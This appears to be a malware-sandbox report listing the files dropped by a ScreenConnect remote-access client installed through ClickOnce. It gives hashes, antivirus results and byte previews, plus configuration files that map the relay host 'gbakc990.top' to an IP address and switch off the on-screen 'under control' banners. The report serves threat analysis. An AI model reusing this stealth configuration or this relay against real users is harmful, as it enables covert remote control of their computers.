SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.862223562830496
Encrypted:	false
SSDEEP:	1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
MD5:	B1799A5A5C0F64E9D61EE4BA465AFE75
SHA1:	7785DA04E98E77FEC7C9E36B8C68864449724D71
SHA-256:	7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
SHA-512:	AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.031251664661689
Encrypted:	false
SSDEEP:	6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
MD5:	16C4F1E36895A0FA2B4DA3852085547A
SHA1:	AB068A2F4FFD0509213455C79D311F169CD7CAB8
SHA-256:	4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
SHA-512:	AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639136400085158
Encrypted:	false
SSDEEP:	24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
MD5:	9F823778701969823C5A01EF3ECE57B7
SHA1:	DA733F482825EC2D91F9F1186A3F934A2EA21FA1
SHA-256:	ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
SHA-512:	FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	601376
Entropy (8bit):	6.185921191564225
Encrypted:	false
SSDEEP:	6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
MD5:	20AB8141D958A58AADE5E78671A719BF
SHA1:	F914925664AB348081DAFE63594A64597FB2FC43
SHA-256:	9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
SHA-512:	C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.58476728626163
Encrypted:	false
SSDEEP:	3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
MD5:	AE0E6EBA123683A59CAE340C894260E9
SHA1:	35A6F5EB87179EB7252131A881A8D5D4D9906013
SHA-256:	D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
SHA-512:	1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\Client.Override.en-US.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	652
Entropy (8bit):	4.646296001566109
Encrypted:	false
SSDEEP:	12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
MD5:	8B45555EF2300160892C25F453098AA4
SHA1:	0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
SHA-256:	75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
SHA-512:	F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\Client.Override.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	21018
Entropy (8bit):	7.841465962209068
Encrypted:	false
SSDEEP:	384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
MD5:	EF6DBD4F9C3BB57F1A2C4AF2847D8C54
SHA1:	41D9329C5719467E8AE8777C2F38DE39F02F6AE4
SHA-256:	0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
SHA-512:	5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?.......K[...D.../L....u..n....$!R..Jh...?.dSUX...V%..Jy.-.

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\Client.en-US.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	50133
Entropy (8bit):	4.759054454534641
Encrypted:	false
SSDEEP:	1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
MD5:	D524E8E6FD04B097F0401B2B668DB303
SHA1:	9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
SHA-256:	07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
SHA-512:	E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C\|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..v.......B....A...a......D..c..w..K,..t...S.....v....7.6\|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........\|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\Client.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	26722
Entropy (8bit):	7.7401940386372345
Encrypted:	false
SSDEEP:	384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
MD5:	5CD580B22DA0C33EC6730B10A6C74932
SHA1:	0B6BDED7936178D80841B289769C6FF0C8EEAD2D
SHA-256:	DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
SHA-512:	C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\a3rp1nvm.newcfg

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	557
Entropy (8bit):	5.043952838645019
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO+yp8/vXbAa3xT:2dL9hK6E46YP1SvH
MD5:	908E53D410F3917E0165F408C86C7C25
SHA1:	DB17764044405EBD9FC2516D7BA8BCF37FD4561E
SHA-256:	0E0912689DFEC14CA7DFF376609DF98521C8089347DAE52B1CC1F0DB7F254C37
SHA-512:	01C05EA3C7EF2A0B47B36EF91A1964B1EA448660F6F957A63F42DE5917C950A75BC9F633D8BF32CE5EC4B05AA411380A43996C0EFB9CAE56E44C71C8B125B109
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>gbakc990.top=31.42.187.210-04%2f10%2f2024%2023%3a03%3a26</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\app.config

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3343
Entropy (8bit):	4.771733209240506
Encrypted:	false
SSDEEP:	96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
MD5:	9322751577F16A9DB8C25F7D7EDD7D9F
SHA1:	DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
SHA-256:	F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
SHA-512:	BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
Malicious:	false
Preview:	<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\user.config (copy)

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	557
Entropy (8bit):	5.043952838645019
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENO+yp8/vXbAa3xT:2dL9hK6E46YP1SvH
MD5:	908E53D410F3917E0165F408C86C7C25
SHA1:	DB17764044405EBD9FC2516D7BA8BCF37FD4561E
SHA-256:	0E0912689DFEC14CA7DFF376609DF98521C8089347DAE52B1CC1F0DB7F254C37
SHA-512:	01C05EA3C7EF2A0B47B36EF91A1964B1EA448660F6F957A63F42DE5917C950A75BC9F633D8BF32CE5EC4B05AA411380A43996C0EFB9CAE56E44C71C8B125B109
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>gbakc990.top=31.42.187.210-04%2f10%2f2024%2023%3a03%3a26</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.068776675019683
Encrypted:	false
SSDEEP:	1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
MD5:	0402CF8AE8D04FCC3F695A7BB9548AA0
SHA1:	044227FA43B7654032524D6F530F5E9B608E5BE4
SHA-256:	C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
SHA-512:	BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1373
Entropy (8bit):	5.369201792577388
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
MD5:	1BF0A215F1599E3CEC10004DF6F37304
SHA1:	169E7E91AC3D25D07050284BB9A01CCC20159DE7
SHA-256:	D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
SHA-512:	68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
Malicious:	false
